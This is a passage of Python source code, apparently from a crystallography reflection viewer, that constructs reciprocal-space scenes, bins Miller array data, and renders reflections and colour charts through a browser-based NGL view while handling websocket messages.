self.SendInfoToGUI({ "bin_labels_type_idxs": self.bin_labels_type_idxs})
self.get_labels_of_data_for_binning()
else:
idx = self.scene_id_to_array_id(scene_id)
(hklscenes, scenemaxdata,
scenemindata, scenemaxsigmas,
sceneminsigmas, scenearrayinfos
) = MakeHKLscene( self.proc_arrays[idx].deep_copy(), idx, copy.deepcopy(self.viewerparams), self.mapcoef_fom_dict, None, self.mprint )
for i,inf in enumerate(scenearrayinfos):
self.mprint("%d, %s" %(idx+i+1, inf[0]), verbose=1)
self.HKLsceneKey = (curphilparam.spacegroup_choice,
curphilparam.using_space_subgroup,
curphilparam.merge_data,
self.viewerparams.expand_anomalous or self.viewerparams.inbrowser,
self.viewerparams.expand_to_p1 or self.viewerparams.inbrowser,
self.viewerparams.inbrowser,
self.viewerparams.slice_axis,
self.viewerparams.slice_mode,
self.viewerparams.slice_index,
self.viewerparams.show_missing,
self.viewerparams.show_only_missing,
self.viewerparams.show_systematic_absences,
self.viewerparams.sigma_color_radius,
self.viewerparams.color_scheme,
self.viewerparams.color_powscale,
sceneid,
self.viewerparams.scale,
str(self.viewerparams.nth_power_scale_radii)
)
self.HKLscenedict[self.HKLsceneKey] = ( hklscenes[i], scenemaxdata[i],
scenemindata[i], scenemaxsigmas[i], sceneminsigmas[i], inf )
sceneid += 1
(
self.HKLscene,
self.HKLscenesMaxdata,
self.HKLscenesMindata,
self.HKLscenesMaxsigmas,
self.HKLscenesMinsigmas,
self.hkl_scenes_info
) = self.HKLscenedict[self.HKLsceneKey]
self.sceneisdirty = True
self.has_new_miller_array = False
return True
def Sceneid_to_SceneKey(self, sceneid):
return (self.params.spacegroup_choice,
self.params.using_space_subgroup,
self.params.merge_data,
self.viewerparams.expand_anomalous or self.viewerparams.inbrowser,
self.viewerparams.expand_to_p1 or self.viewerparams.inbrowser,
self.viewerparams.inbrowser,
self.viewerparams.slice_axis,
self.viewerparams.slice_mode,
self.viewerparams.slice_index,
self.viewerparams.show_missing,
self.viewerparams.show_only_missing,
self.viewerparams.show_systematic_absences,
self.viewerparams.sigma_color_radius,
self.viewerparams.color_scheme,
self.viewerparams.color_powscale,
sceneid,
self.viewerparams.scale,
str(self.viewerparams.nth_power_scale_radii)
)
def HKLscene_from_dict(self, sceneid=None):
if sceneid is None:
sceneid = self.viewerparams.scene_id
HKLsceneKey = self.Sceneid_to_SceneKey(sceneid)
if not self.HKLscenedict.get(HKLsceneKey, False):
self.ConstructReciprocalSpace(self.params, scene_id=sceneid)
return self.HKLscenedict[HKLsceneKey][0]
def HKLMaxData_from_dict(self, sceneid=None):
if sceneid is None:
sceneid = self.viewerparams.scene_id
HKLsceneKey = self.Sceneid_to_SceneKey(sceneid)
if not self.HKLscenedict.get(HKLsceneKey, False):
self.ConstructReciprocalSpace(self.params, scene_id=sceneid)
return self.HKLscenedict[HKLsceneKey][1]
def HKLMinData_from_dict(self, sceneid=None):
if sceneid is None:
sceneid = self.viewerparams.scene_id
HKLsceneKey = self.Sceneid_to_SceneKey(sceneid)
if not self.HKLscenedict.get(HKLsceneKey, False):
self.ConstructReciprocalSpace(self.params, scene_id=sceneid)
return self.HKLscenedict[HKLsceneKey][2]
def HKLMaxSigmas_from_dict(self, sceneid=None):
if sceneid is None:
sceneid = self.viewerparams.scene_id
HKLsceneKey = self.Sceneid_to_SceneKey(sceneid)
if not self.HKLscenedict.get(HKLsceneKey, False):
self.ConstructReciprocalSpace(self.params, scene_id=sceneid)
return self.HKLscenedict[HKLsceneKey][3]
def HKLMinSigmas_from_dict(self, sceneid=None):
if sceneid is None:
sceneid = self.viewerparams.scene_id
HKLsceneKey = self.Sceneid_to_SceneKey(sceneid)
if not self.HKLscenedict.get(HKLsceneKey, False):
self.ConstructReciprocalSpace(self.params, scene_id=sceneid)
return self.HKLscenedict[HKLsceneKey][4]
def HKLInfo_from_dict(self, sceneid=None):
if sceneid is None:
sceneid = self.viewerparams.scene_id
HKLsceneKey = self.Sceneid_to_SceneKey(sceneid)
if not self.HKLscenedict.get(HKLsceneKey, False):
self.ConstructReciprocalSpace(self.params, scene_id=sceneid)
return self.HKLscenedict[HKLsceneKey][5]
def identify_suitable_fomsarrays(self):
self.mprint("Matching complex arrays to suitable FOM arrays", verbose=1)
self.mapcoef_fom_dict = {}
self.sceneid_from_arrayid = []
for k,proc_array in enumerate(self.proc_arrays):
#if not proc_array.is_complex_array() or not proc_array.is_real_array():
# continue
fom_arrays_idx = []
array_scene_ids = [(k,k)]
for i,foms_array in enumerate(self.proc_arrays):
if not proc_array.is_complex_array() or not foms_array.is_real_array():
continue
if proc_array.size() != foms_array.size():
continue
if min(foms_array.data()) < 0.0 or flex.max(foms_array.data()) > 1.0:
continue
fom_arrays_idx.append( (foms_array, i) )
array_scene_ids.append((k,i))
self.sceneid_from_arrayid.extend( array_scene_ids)
self.mapcoef_fom_dict[proc_array.info().label_string()] = fom_arrays_idx
def scene_id_to_array_id(self, scene_id):
for i,array_scene_id in enumerate(self.sceneid_from_arrayid):
if scene_id == i:
return array_scene_id[0]
raise Sorry("scene_id, %d, is out of range" %scene_id)
def calc_bin_thresholds(self, binner_idx, nbins):
# make default bin thresholds if scene_bin_thresholds is not set
binscenelabel = self.bin_labels_type_idxs[binner_idx][0]
self.mprint("Using %s for binning" %binscenelabel)
if binscenelabel=="Resolution":
warray = self.HKLscene_from_dict(int(self.viewerparams.scene_id)).work_array
dres = self.HKLscene_from_dict(int(self.viewerparams.scene_id)).dres
uc = warray.unit_cell()
indices = self.HKLscene_from_dict(int(self.viewerparams.scene_id)).indices
dmax,dmin = warray.d_max_min(d_max_is_highest_defined_if_infinite=True) # to avoid any F000 reflection
if dmax == dmin: # say if only one reflection
binvals = [dres[0]-0.1, dmin +0.1]
nuniquevalues = 2
else: # use generic binning function from cctbx
binning = miller.binning( uc, nbins, indices, dmax, dmin )
binvals = [ binning.bin_d_range(n)[0] for n in binning.range_all() ]
binvals = [ e for e in binvals if e != -1.0] # delete dummy limit
binvals = list( 1.0/flex.double(binvals) )
nuniquevalues = len(set(list(dres)))
elif binscenelabel=="Singletons":
binvals = [ -1.5, -0.5, 0.5, 1.5 ]
nuniquevalues = len(binvals)
else:
bindata, dummy = self.get_matched_binarray(binner_idx)
selection = flex.sort_permutation( bindata )
bindata_sorted = bindata.select(selection)
# get binvals by dividing bindata_sorted with nbins
binvals = [bindata_sorted[0]] * nbins #
for i,e in enumerate(bindata_sorted):
idiv = int(nbins*float(i)/len(bindata_sorted))
binvals[idiv] = e
nuniquevalues = len(set(list(bindata)))
binvals.sort()
self.mprint("Bin thresholds are:\n" + str(binvals))
return binvals, nuniquevalues
def UpdateBinValues(self, binner_idx, binvals = [], nuniquevalues = -1):
if binvals:
binvals.sort()
self.binvals = binvals
else: # ensure default resolution interval includes all data by avoiding rounding errors
self.binvals = [ 1.0/(self.miller_array.d_max_min()[0]*1.001),
1.0/(self.miller_array.d_max_min()[1]*0.999) ]
if nuniquevalues == -1:
if binner_idx==0:
nuniquevalues = len(set(list( self.HKLscene_from_dict(int(self.viewerparams.scene_id)).dres )))
else:
bindata, dummy = self.get_matched_binarray(binner_idx)
nuniquevalues = len(set(list(bindata)))
self.nuniqueval = nuniquevalues
def get_matched_binarray(self, binner_idx):
binscenelabel, datatype, sceneid = self.bin_labels_type_idxs[binner_idx]
label = self.HKLscene_from_dict(sceneid).work_array.info().label_string()
if datatype == "hassigmas" and binscenelabel == "Sigmas of " + label:
bindata = self.HKLscene_from_dict(sceneid).sigmas.deep_copy()
binvalsboundaries = [ self.HKLMinSigmas_from_dict(sceneid) - 0.1 , self.HKLMaxSigmas_from_dict(sceneid) + 0.1 ]
elif datatype in "Map coeffs" and "Phases of " + label in binscenelabel:
bindata = self.HKLscene_from_dict(sceneid).phases.deep_copy()
# preselect centric reflections, i.e. those with phi = 0 or 180
binvalsboundaries = [-0.01, 0.01, 179.99, 180.01, 359.99, 360]
elif datatype in "Map coeffs" and "Amplitudes of " + label in binscenelabel:
bindata = self.HKLscene_from_dict(sceneid).ampl.deep_copy()
binvalsboundaries = [ self.HKLMinData_from_dict(sceneid) - 0.1 , self.HKLMaxData_from_dict(sceneid) + 0.1 ]
else:
bindata = self.HKLscene_from_dict(sceneid).data.deep_copy()
binvalsboundaries = [ self.HKLMinData_from_dict(sceneid) - 0.1 , self.HKLMaxData_from_dict(sceneid) + 0.1 ]
return bindata, binvalsboundaries
def MatchBinArrayToSceneArray(self):
# match bindata with data or sigmas
if self.bin_labels_type_idxs[self.params.binner_idx][0] == "Resolution":
return 1.0/self.scene.dres
binarraydata, dummy = self.get_matched_binarray(self.params.binner_idx)
scenearraydata = self.HKLscene_from_dict(self.viewerparams.scene_id).data
ibinarray = self.bin_labels_type_idxs[self.params.binner_idx][2]
matchindices = miller.match_indices(self.HKLscene_from_dict(self.viewerparams.scene_id).indices,
self.HKLscene_from_dict(ibinarray).indices )
matched_binarray = binarraydata.select( matchindices.pairs().column(1) )
#valarray.sort(by_value="packed_indices")
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
#missing = scenearraydata.lone_set( valarray )
# insert NAN values for reflections in self.miller_array not found in binarray
#valarray = display.ExtendMillerArray(valarray, missing.size(), missing.indices() )
#match_valindices = miller.match_indices(scenearray.indices(), valarray.indices() )
#match_valarray = valarray.select( match_valindices.pairs().column(1) )
#match_valarray.sort(by_value="packed_indices")
#match_valarray.set_info(binarraydata.info() )
# patch the bin array so its sequence matches the scene array
patched_binarraydata = []
c = 0
for b in matchindices.pair_selection(0):
if b:
patched_binarraydata.append(matched_binarray[c])
c +=1
else:
patched_binarraydata.append(float("nan"))
return flex.double(patched_binarraydata)
def OperateOn1MillerArray(self, millarr, operation):
# lets user specify a python expression operating on millarr
newarray = millarr.deep_copy()
dres = newarray.unit_cell().d( newarray.indices() )
self.mprint("Creating new miller array through the operation:\n%s" %operation)
try:
ldic= {'dres': dres, 'array1': newarray, 'newarray': newarray }
exec(operation, globals(), ldic)
newarray = ldic.get("newarray", None)
return newarray
except Exception as e:
raise Sorry(str(e))
def OperateOn2MillerArrays(self, millarr1, millarr2, operation):
# lets user specify a python expression operating on millarr1 and millarr2
matchindices = miller.match_indices(millarr1.indices(), millarr2.indices() )
matcharr1 = millarr1.select( matchindices.pairs().column(0) ).deep_copy()
matcharr2 = millarr2.select( matchindices.pairs().column(1) ).deep_copy()
dres = matcharr1.unit_cell().d( matcharr1.indices() )
newarray = matcharr2.deep_copy()
self.mprint("Creating new miller array through the operation:\n%s" %operation)
try:
ldic= { 'dres': dres, 'array1': matcharr1, 'array2': matcharr2, 'newarray': newarray }
exec(operation, globals(), ldic)
newarray = ldic.get("newarray", None)
return newarray
except Exception as e:
raise Sorry(str(e))
def get_colour_map_radii_power(self):
datatype = self.get_current_datatype()
if self.viewerparams.sigma_color_radius:
datatype = datatype + "_sigmas"
if datatype not in self.datatypedict.keys():
# ensure individual copies of datatypedefault and not references to the same
self.datatypedict[ datatype ] = self.datatypedefault[:]
colourscheme, colourpower, powerscale, radiiscale = \
self.datatypedict.get( datatype, self.datatypedefault[:] )
return colourscheme, colourpower, powerscale, radiiscale
def add_colour_map_radii_power_to_dict(self):
datatype = self.get_current_datatype()
if datatype is None:
return
if self.viewerparams.sigma_color_radius:
datatype = datatype + "_sigmas"
if datatype not in self.datatypedict.keys():
# ensure individual copies of datatypedefault and not references to the same
self.datatypedict[ datatype ] = self.datatypedefault[:]
self.datatypedict[datatype][0] = self.viewerparams.color_scheme
self.datatypedict[datatype][1] = self.viewerparams.color_powscale
self.datatypedict[datatype][2] = self.viewerparams.nth_power_scale_radii
self.datatypedict[datatype][3] = self.viewerparams.scale
def DrawNGLJavaScript(self, blankscene=False):
if not self.scene or not self.sceneisdirty:
return
if self.scene.points.size() == 0:
blankscene = True
if self.miller_array is None :
self.mprint( "Select a dataset to display reflections" )
blankscene = True
else:
self.mprint("Rendering reflections...")
h_axis = flex.vec3_double([self.scene.axes[0]])
k_axis = flex.vec3_double([self.scene.axes[1]])
l_axis = flex.vec3_double([self.scene.axes[2]])
self.unit_h_axis = 1.0/h_axis.norm() * h_axis
self.unit_k_axis = 1.0/k_axis.norm() * k_axis
self.unit_l_axis = 1.0/l_axis.norm() * l_axis
self.unit_normal_hk = self.unit_h_axis.cross( self.unit_k_axis )
self.unit_normal_kl = self.unit_k_axis.cross( self.unit_l_axis )
self.unit_normal_lh = self.unit_l_axis.cross( self.unit_h_axis )
self.normal_hk = h_axis.cross( k_axis )
self.normal_kl = k_axis.cross( l_axis )
self.normal_lh = l_axis.cross( h_axis )
maxnorm = max(h_axis.norm(), max(k_axis.norm(), l_axis.norm()))
l1 = self.scene.renderscale * maxnorm * 1.1
l2= self.scene.renderscale * maxnorm * 1.15
Hstararrowstart = roundoff( [-self.unit_h_axis[0][0]*l1, -self.unit_h_axis[0][1]*l1, -self.unit_h_axis[0][2]*l1] )
Hstararrowend = roundoff( [self.unit_h_axis[0][0]*l1, self.unit_h_axis[0][1]*l1, self.unit_h_axis[0][2]*l1] )
Hstararrowtxt = roundoff( [self.unit_h_axis[0][0]*l2, self.unit_h_axis[0][1]*l2, self.unit_h_axis[0][2]*l2] )
Kstararrowstart = roundoff( [-self.unit_k_axis[0][0]*l1, -self.unit_k_axis[0][1]*l1, -self.unit_k_axis[0][2]*l1] )
Kstararrowend = roundoff( [self.unit_k_axis[0][0]*l1, self.unit_k_axis[0][1]*l1, self.unit_k_axis[0][2]*l1] )
Kstararrowtxt = roundoff( [self.unit_k_axis[0][0]*l2, self.unit_k_axis[0][1]*l2, self.unit_k_axis[0][2]*l2] )
Lstararrowstart = roundoff( [-self.unit_l_axis[0][0]*l1, -self.unit_l_axis[0][1]*l1, -self.unit_l_axis[0][2]*l1] )
Lstararrowend = roundoff( [self.unit_l_axis[0][0]*l1, self.unit_l_axis[0][1]*l1, self.unit_l_axis[0][2]*l1] )
Lstararrowtxt = roundoff( [self.unit_l_axis[0][0]*l2, self.unit_l_axis[0][1]*l2, self.unit_l_axis[0][2]*l2] )
if not blankscene:
self.viewerparams.color_scheme, self.viewerparams.color_powscale, self.viewerparams.nth_power_scale_radii, \
self.viewerparams.scale = self.get_colour_map_radii_power()
# Make colour gradient array used for drawing a bar of colours next to associated values on the rendered html
mincolourscalar = self.HKLMinData_from_dict(self.colour_scene_id)
maxcolourscalar = self.HKLMaxData_from_dict(self.colour_scene_id)
if self.viewerparams.sigma_color_radius:
mincolourscalar = self.HKLMinSigmas_from_dict(self.colour_scene_id)
maxcolourscalar = self.HKLMaxSigmas_from_dict(self.colour_scene_id)
span = maxcolourscalar - mincolourscalar
ln = 120
incr = span/ln
colourgradarrays = []
val = mincolourscalar
colourscalararray = flex.double()
colourscalararray.append( val )
for j,sc in enumerate(range(ln)):
val += incr
colourscalararray.append( val )
if self.HKLscene_from_dict(self.colour_scene_id).miller_array.is_complex_array():
# When displaying phases from map coefficients together with fom values
# compute colour map chart as a function of fom and phase values (x,y axis)
incr = 360.0/ln
val = 0.0
colourscalararray = flex.double()
colourscalararray.append( val )
for j in enumerate(range(ln)):
val += incr
colourscalararray.append( val )
fomarrays = []
COL = display.MplColorHelper(self.viewerparams.color_scheme, 0, 360)
rgbcolarray = flex.vec3_double( [ COL.get_rgb(d)[0:3] for d in colourscalararray ] )
if self.HKLscene_from_dict(self.colour_scene_id).isUsingFOMs():
fomln = 50
fom = 1.0
fomdecr = 1.0/(fomln-1.0)
for j in range(fomln):
fomarrays.append( flex.double(len(colourscalararray), fom) )
fom -= fomdecr
for j in range(fomln):
arr = graphics_utils.map_to_rgb_colourmap(
data_for_colors= colourscalararray,
colormap= rgbcolarray,
selection=flex.bool(colourscalararray.size(), True),
attenuation = fomarrays[j]
)
colourgradarrays.append( arr*256 )
else:
fomln =1
fomarrays = [1.0]
arr = graphics_utils.map_to_rgb_colourmap(
data_for_colors= colourscalararray,
colormap = rgbcolarray,
selection=flex.bool(colourscalararray.size(), True),
)
colourgradarrays.append( arr*256 )
else:
fomln = 1
fomarrays = [1.0]
COL = display.MplColorHelper(self.viewerparams.color_scheme, mincolourscalar, maxcolourscalar)
rgbcolarray = flex.vec3_double( [ COL.get_rgb(d)[0:3] for d in colourscalararray ])
arr = graphics_utils.map_to_rgb_colourmap(
data_for_colors= colourscalararray,
colormap = rgbcolarray,
selection=flex.bool(colourscalararray.size(), True),
powscale = self.viewerparams.color_powscale
)
colourgradarrays.append(arr*256)
colors = self.HKLscene_from_dict(self.colour_scene_id).colors
radii = self.HKLscene_from_dict(self.radii_scene_id).radii
self.meanradius = flex.mean(radii)
bin_labels_type_idx = self.bin_labels_type_idxs[self.params.binner_idx]
if blankscene:
points = flex.vec3_double( [ ] )
colors = flex.vec3_double( [ ] )
radii = flex.double( [ ] )
bin_labels_type_idx = self.bin_labels_type_idxs[0]
else:
points = self.scene.points
nrefls = points.size()
hkls = self.scene.indices
dres = self.scene.dres
if bin_labels_type_idx[0] =="Resolution":
colstr = "dres"
elif bin_labels_type_idx[0] =="Singletons":
colstr = "Singleton"
else:
if not blankscene:
colstr = self.HKLscene_from_dict(bin_labels_type_idx[2]).work_array.info().label_string()
data = self.scene.data
if not blankscene:
colourlabel = self.HKLscene_from_dict(self.colour_scene_id).colourlabel
fomlabel = self.HKLscene_from_dict(self.colour_scene_id).fomlabel
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
assert (colors.size() == radii.size() == nrefls)
self.colours = []
self.positions = []
self.radii2 = []
self.spbufttips = []
self.binvalsboundaries = []
if not blankscene:
if bin_labels_type_idx[0] =="Resolution":
self.binvalsboundaries = self.binvals
self.bindata = 1.0/self.scene.dres
elif bin_labels_type_idx[0] =="Singletons":
self.binvalsboundaries = self.binvals
self.bindata = self.scene.singletonsiness
else:
dummy, self.binvalsboundaries = self.get_matched_binarray(self.params.binner_idx)
self.binvalsboundaries.extend( self.binvals )
self.binvalsboundaries.sort()
if self.binvalsboundaries[0] < 0.0:
self.binvalsboundaries.append(0.0)
self.binvalsboundaries.sort()
self.bindata = self.MatchBinArrayToSceneArray()
self.nbinvalsboundaries = len(self.binvalsboundaries)
# avoid resetting opacities of bins unless we change the number of bins
if self.oldnbinvalsboundaries != self.nbinvalsboundaries:
self.ngl_settings.bin_opacities = str([ (1.0, e) for e in range(self.nbinvalsboundaries + 1) ])
self.oldnbinvalsboundaries = self.nbinvalsboundaries
# Un-binnable data are scene data values where there are no matching reflections in the bin data
# Put these in a separate bin and be diligent with the book keeping!
for ibin in range(self.nbinvalsboundaries+1): # adding the extra bin for un-binnable data
self.colours.append([]) # colours and positions are 3 x size of data()
self.positions.append([])
self.radii2.append([])
self.spbufttips.append([])
def data2bin(d, binvalsboundaries, nbinvalsboundaries):
for ibin, binval in enumerate(binvalsboundaries):
if math.isnan(d): # NaN values are un-binnable. Tag them for an additional last bin
return nbinvalsboundaries
if (ibin+1) == nbinvalsboundaries:
return ibin
if d > binval and d <= binvalsboundaries[ibin+1]:
return ibin
raise Sorry("data2bin: Should never get here")
def getprecision(v1,v2):
diff = abs(v1-v2); precision = 1; e = 1
while diff*e < 1.0:
e *= 10
precision += 1
return precision
if nrefls > 0 and self.bindata.size() != points.size():
raise Sorry("Not the same number of reflections in bin-data and displayed data")
start_time = time.time()
for i, hklstars in enumerate(points):
# bin currently displayed data according to the values of another miller array
ibin = data2bin( self.bindata[i], self.binvalsboundaries, self.nbinvalsboundaries )
self.positions[ibin].extend( graphics_utils.flt_roundoffvec3(hklstars, 2) )
self.colours[ibin].extend( graphics_utils.flt_roundoffvec3(colors[i], 2) )
self.radii2[ibin].append( graphics_utils.flt_roundoff(radii[i], 2) )
self.spbufttips[ibin].append( i )
elapsed_time = time.time() - start_time
self.mprint("elapsed time: %s" %elapsed_time, verbose=2)
spherebufferstr = self.colstraliases
cntbin = 0
self.binstrs = []
self.bin_infotpls = []
if self.nuniqueval < self.params.nbins:
self.mprint("%d bins was requested but %s data has only %d unique value(s)!" %(self.params.nbins, colstr, self.nuniqueval), 0)
for ibin in range(self.nbinvalsboundaries+1):
mstr =""
nreflsinbin = len(self.radii2[ibin])
if nreflsinbin == 0:
continue
bin2 = float("nan"); bin1= float("nan") # indicates un-binned data
if ibin == self.nbinvalsboundaries:
mstr= "bin[%d] has %d reflections with no %s values (assigned to %2.3f)" %(cntbin, nreflsinbin, \
colstr, bin1)
precision = 3
if ibin < (self.nbinvalsboundaries-1):
bin1 = self.binvalsboundaries[ibin]
bin2 = self.binvalsboundaries[ibin+1]
bin3 = bin2
if ibin < (self.nbinvalsboundaries-2):
bin3= self.binvalsboundaries[ibin+2]
if colstr=="dres":
bin1= 1.0/self.binvalsboundaries[ibin]
bin2= 1.0/self.binvalsboundaries[ibin+1]
if ibin < (self.nbinvalsboundaries-2):
bin3= 1.0/self.binvalsboundaries[ibin+2]
#calculate precision by comparing a bin value with bin value below and above it
prec1 = getprecision(bin1, bin2)
prec2 = prec1
if bin2 != bin3:
prec2 = getprecision(bin3, bin2)
precision = max(prec1, prec2)
# format bin values string with necessary decimal places (precision)
binformatstr = "]%2." + str(precision) + "f; %2." + str(precision) + "f]"
mstr= "bin[%d] has %d reflections with %s in " %(cntbin, nreflsinbin, colstr)
mstr += binformatstr %(bin1, bin2)
self.bin_infotpls.append( roundoff((nreflsinbin, bin1, bin2 ), precision) )
self.binstrs.append(mstr)
self.mprint(mstr, verbose=1)
cntbin += 1
if self.ngl_settings.bin_opacities == "":
self.ngl_settings.bin_opacities = str([ (1.0, e) for e in range(cntbin) ])
self.SendInfoToGUI( { "bin_opacities": self.ngl_settings.bin_opacities,
"bin_infotpls": self.bin_infotpls,
"binner_idx": self.params.binner_idx,
"tooltip_opacity": self.ngl_settings.tooltip_alpha
} )
colourgradstr = []
if not blankscene:
self.calc_rotation_axes()
nvaluelabels = int(ln/self.viewerparams.ncolourlabels )
colourgradstrs = []
# if displaying phases from map coefficients together with fom values then
for g,colourgradarray in enumerate(colourgradarrays):
self.colourgradientvalues = []
for j,e in enumerate(colourgradarray):
self.colourgradientvalues.append( [colourscalararray[j], e] )
self.colourgradientvalues = roundoff( self.colourgradientvalues )
fom = fomarrays[g]
colourgradstr = []
for j,val in enumerate(self.colourgradientvalues):
vstr = "null"
alpha = 1.0
rgb = (int(val[1][0]), int(val[1][1]), int(val[1][2]) )
if j % nvaluelabels == 0 or j==(len(self.colourgradientvalues)-1) :
vstr = roundoff(val[0], 2)
colourgradstr.append([vstr, rgb[0], rgb[1], rgb[2] ])
colourgradstrs.append(colourgradstr)
if not self.WBmessenger.browserisopen:
self.ReloadNGL()
if not blankscene:
self.RemoveStageObjects()
for ibin in range(self.nbinvalsboundaries+1):
nreflsinbin = len(self.radii2[ibin])
if nreflsinbin == 0:
continue
self.SetBrowserDebug(str(self.verbose>=2).lower())
self.SetFontSize(self.ngl_settings.fontsize)
self.DefineHKL_Axes(str(Hstararrowstart), str(Hstararrowend),
str(Kstararrowstart), str(Kstararrowend),
str(Lstararrowstart), str(Lstararrowend),
Hstararrowtxt, Kstararrowtxt, Lstararrowtxt )
self.SendCoordinates2Browser(self.positions[ibin], self.colours[ibin],
self.radii2[ibin], self.spbufttips[ibin] )
self.RenderStageObjects()
self.MakeColourChart(10, 10, colourlabel, fomlabel, colourgradstrs)
if self.WaitforHandshake():
nwait = 0
while self.viewmtrx is None and nwait < self.handshakewait:
time.sleep(self.sleeptime)
nwait += self.sleeptime
self.GetClipPlaneDistances()
self.GetBoundingBox()
self.OrigClipFar = self.clipFar
self.OrigClipNear = self.clipNear
self.SetMouseSpeed( self.ngl_settings.mouse_sensitivity )
if self.isnewfile:
self.SetAutoView()
self.isnewfile = False
self.sceneisdirty = False
self.lastscene_id = self.viewerparams.scene_id
def ProcessBrowserMessage(self, message):
try:
if sys.version_info[0] > 2:
ustr = str
else:
ustr = unicode
if isinstance(message, bytes) and isinstance(self.lastmsg, ustr) and "Imageblob" in self.lastmsg:
self.mprint( "Saving image to file", verbose=1)
with open( self.imagename, "wb") as imgfile:
imgfile.write( message)
if isinstance(message, ustr) and message != "":
if "Orientation" in message:
self.ProcessOrientationMessage(message)
elif 'Received message:' in message:
self.mprint( message, verbose=2)
elif 'Browser: Got' in message:
self.mprint( message, verbose=2)
elif "websocket" in message:
self.mprint( message, verbose=1)
elif "Refreshing" in message or "disconnecting" in message:
self.mprint( message, verbose=1)
time.sleep(self.sleeptime)
elif "AutoViewSet" in message:
self.set_volatile_params()
elif "JavaScriptCleanUpDone:" in message:
self.mprint( message, verbose=1)
time.sleep(0.5) # time for browser to clean up
if not self.isnewfile:
self.WBmessenger.StopWebsocket()
elif "JavaScriptError:" in message:
self.mprint( message, verbose=0)
elif "Expand" in message:
self.mprint( message, verbose=2)
elif "Connection lost" in message:
self.mprint( message, verbose=1)
elif "Warning!: Web browser closed unexpectedly" in message:
self.mprint( message, verbose=1)
elif "Imageblob" in message:
self.mprint( "Image to be received", verbose=1)
elif "ImageWritten" in message:
self.mprint( "Image saved to file", verbose=0)
elif "ReturnClipPlaneDistances:" in message:
datastr = message[ message.find("\n") + 1: ]
lst = datastr.split(",")
flst = [float(e) for e in lst]
self.clipNear = flst[0]
self.clipFar = flst[1]
self.cameraPosZ = flst[2]
self.clipplane_msg_sem.release()
elif "ReturnBoundingBox:" in message:
datastr = message[ message.find("\n") + 1: ]
lst = datastr.split(",")
flst = [float(e) for e in lst]
self.boundingX = flst[0]
self.boundingY = flst[1]
self.boundingZ = flst[2]
self.boundingbox_msg_sem.release()
elif "ReturnMouseSpeed" in message:
datastr = message[ message.find("\n") + 1: ]
lst = datastr.split(",")
flst = [float(e) for e in lst]
if flst[0] is not None and not cmath.isnan(flst[0]):
self.ngl_settings.mouse_sensitivity = flst[0]
self.mousespeed_msg_sem.release()
elif "tooltip_id:" in message:
ttipids = message.split("tooltip_id:")[1]
hklid = eval(message.split("tooltip_id:")[1])[0]
sym_id = eval(message.split("tooltip_id:")[1])[1]
is_friedel_mate = eval(message.split("tooltip_id:")[1])[2]
ttip = self.GetTooltipOnTheFly(hklid, sym_id, is_friedel_mate)
self.AddToBrowserMsgQueue("ShowThisTooltip", ttip)
elif "match_hkl_id:" in message:
hklid = eval(message.split("match_hkl_id:")[1])[0]
sym_id = eval(message.split("match_hkl_id:")[1])[1]
is_friedel_mate = eval(message.split("match_hkl_id:")[1])[2]
if self.sg.info().symbol_and_number() == self.miller_array.space_group().info().symbol_and_number():
self.make_visual_symHKLs(hklid, sym_id, is_friedel_mate)
self.visualise_sym_HKLs()
hkl = self.scene.indices[hklid]
hklmatches = miller.match_indices(self.parent.origarrays["HKLs"], [hkl])
orig_hkl_ids = list(hklmatches.pairs().column(0))
self.SendInfoToGUI( { "clicked_HKL": hkl, "orig_hkl_ids": orig_hkl_ids })
elif "onClick colour chart" in message:
self.onClickColourChart()
elif "SelectedBrowserDataColumnComboBox" in message:
sceneid = int(message.split(":")[1])
self.parent.SetScene(sceneid)
else:
if "Ready " in message:
self.mprint( message, verbose=5)
except Exception as e:
self.mprint( to_str(e) + "\n" + traceback.format_exc(limit=10), verbose=0)
self.lastmsg = message
def GetCameraPosRotTrans(self, viewmtrx):
lst = viewmtrx.split(",")
flst = [float(e) for e in lst]
ScaleRotMx = matrix.sqr( (flst[0], flst[4], flst[8],
flst[1], flst[5], flst[9],
flst[2], flst[6], flst[10]
)
)
cameratranslation = (flst[12], flst[13], flst[14])
self.mprint("translation: %s" %str(roundoff(cameratranslation)), verbose=3)
alllst = roundoff(flst)
self.mprint("""OrientationMatrix matrix:
%s, %s, %s, %s
%s, %s, %s, %s
%s, %s, %s, %s
%s, %s, %s, %s
Distance: %s
""" %tuple(alllst), verbose=4)
rotdet = ScaleRotMx.determinant()
if rotdet <= 0.0:
self.mprint("Negative orientation matrix determinant!!", verbose=1)
self.SetAutoView() # return old values as a fall back even if they're out of date
return self.cameraPosZ, self.currentRotmx, self.cameratranslation
else:
cameradist = math.pow(rotdet, 1.0/3.0)
self.mprint("Scale distance: %s" %roundoff(cameradist), verbose=3)
currentRotmx = matrix.identity(3)
if cameradist > 0.0:
currentRotmx = ScaleRotMx/cameradist
cameraPosZ = cameradist
return cameraPosZ, currentRotmx, cameratranslation
def ProcessOrientationMessage(self, message):
if self.viewerparams.scene_id is None or self.miller_array is None:
return
if message.find("NaN")>=0 or message.find("undefined")>=0:
return
if "OrientationBeforeReload:" in message:
if not self.isnewfile:
self.viewmtrx = message[ message.find("\n") + 1: ]
self.lastviewmtrx = self.viewmtrx
self.isnewfile = False
self.viewmtrx = message[ message.find("\n") + 1: ]
self.cameraPosZ, self.currentRotmx, self.cameratranslation = self.GetCameraPosRotTrans( self.viewmtrx)
rotlst = roundoff(self.currentRotmx.elems, 4)
self.mprint("""Rotation matrix:
%s, %s, %s
%s, %s, %s
%s, %s, %s
""" %rotlst, verbose=3)
uc = self.miller_array.unit_cell()
OrtMx = matrix.sqr( uc.fractionalization_matrix() )
InvMx = OrtMx.inverse()
# Our local coordinate system has x-axis pointing right and z axis pointing out of the screen
# unlike threeJS so rotate the coordinates emitted from there before presenting them
Xvec = matrix.rec([1,0,0] ,n=(1,3))
Yvec = matrix.rec([0,1,0] ,n=(1,3))
Zvec = matrix.rec([0,0,1] ,n=(1,3))
RotAroundYMx = matrix.sqr([-1.0,0.0,0.0, 0.0,1.0,0.0, 0.0,0.0,-1.0])
Xhkl = list(InvMx.transpose()*self.currentRotmx.inverse()* RotAroundYMx.transpose()* Xvec.transpose())
Yhkl = list(InvMx.transpose()*self.currentRotmx.inverse()* RotAroundYMx.transpose()* Yvec.transpose())
Zhkl = list(InvMx.transpose()*self.currentRotmx.inverse()* RotAroundYMx.transpose()* Zvec.transpose())
if self.debug:
